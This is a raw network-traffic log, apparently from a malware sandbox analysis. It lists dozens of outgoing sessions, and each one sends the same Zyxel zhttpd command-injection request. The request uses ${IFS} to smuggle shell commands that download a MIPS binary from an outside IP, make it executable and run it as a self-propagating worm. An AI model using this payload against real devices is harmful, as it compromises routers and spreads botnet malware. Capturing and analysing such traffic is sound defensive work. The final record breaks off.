                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4849192.168.2.135663036.209.18.164443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.512891054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4850192.168.2.1332976167.213.183.131443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.512948990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4851192.168.2.1340536109.112.10.125443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.512990952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4852192.168.2.134305641.197.188.45443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.513035059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4853192.168.2.1337094171.221.57.186443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.513067961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4854192.168.2.1349352220.106.250.83443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.513096094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4855192.168.2.1356006173.206.134.232443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.513123989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4856192.168.2.135776080.67.210.27443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.513149977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4857192.168.2.1356044122.177.42.9443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.513163090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4858192.168.2.135228239.230.8.180443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.513195992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4859192.168.2.134234467.150.103.177443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.513248920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4860192.168.2.1360382172.60.147.5443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.513281107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4861192.168.2.134393253.92.46.78443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.513340950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4862192.168.2.1345448102.182.49.183443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.513386011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4863192.168.2.133500871.47.51.24443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.513433933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4864192.168.2.1344974130.118.33.54443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.513482094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4865192.168.2.1356832223.18.165.188443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.513506889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4866192.168.2.1341778166.145.234.52443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.513551950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4867192.168.2.135544263.156.27.211443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.513586998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4868192.168.2.134616038.182.197.210443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.513643026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4869192.168.2.133945267.108.40.139443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.513681889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4870192.168.2.1347932112.243.227.186443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.513705015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4871192.168.2.1354180156.34.34.191443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.513751030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4872192.168.2.135554217.95.17.174443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.513794899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4873192.168.2.1337516166.218.241.210443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.513838053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4874192.168.2.1355804199.53.220.173443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.513885021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4875192.168.2.134170448.148.191.116443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.513940096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4876192.168.2.1333042173.10.81.231443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.513942957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4877192.168.2.1332798144.21.64.37443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.513997078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4878192.168.2.1340790126.253.251.137443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.514045954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4879192.168.2.133516223.229.235.88443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.514086962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4880192.168.2.1360644161.132.171.224443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.514157057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4881192.168.2.1346712126.139.8.38443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.514187098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4882192.168.2.1346170182.137.219.60443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.514223099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4883192.168.2.1339712138.68.63.156443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.514275074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4884192.168.2.134776435.38.104.95443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.514313936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4885192.168.2.1345748154.23.122.18443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.514328957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4886192.168.2.133578087.138.8.248443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.514360905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4887192.168.2.134217035.34.251.28443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.514420033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4888192.168.2.134647481.93.53.193443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.514441967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4889192.168.2.133821496.183.200.53443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.514496088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4890192.168.2.1340004195.29.37.142443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.514548063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4891192.168.2.133812253.218.89.159443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.514585018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4892192.168.2.135681679.175.76.118443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.514611959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4893192.168.2.134301660.220.160.125443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.514667988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4894192.168.2.1341878109.183.18.227443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.514704943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4895192.168.2.13601264.197.163.75443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.514734983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4896192.168.2.13439048.150.101.24443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.514770985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4897192.168.2.1357540117.116.214.105443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.514818907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4898192.168.2.13496461.108.125.227443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.514853954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4899192.168.2.134820678.0.208.210443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.514894962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4900192.168.2.1357810201.225.55.40443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.514926910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4901192.168.2.1346970182.101.31.26443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.514976025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4902192.168.2.1342138117.242.221.57443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.515013933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4903192.168.2.135184893.212.214.12443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.515057087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4904192.168.2.135591634.204.174.67443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.515158892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4905192.168.2.1340322182.160.219.51443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.515178919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4906192.168.2.135174297.133.247.178443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.515214920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4907192.168.2.135704088.25.84.86443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.515269041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4908192.168.2.134964618.6.33.23443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.515302896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4909192.168.2.133822473.75.229.129443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.515332937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4910192.168.2.1351088177.63.211.227443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.515382051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4911192.168.2.1339504114.105.59.161443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.515422106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4912192.168.2.134644412.30.35.140443
                                        TimestampBytes transferredDirectionData
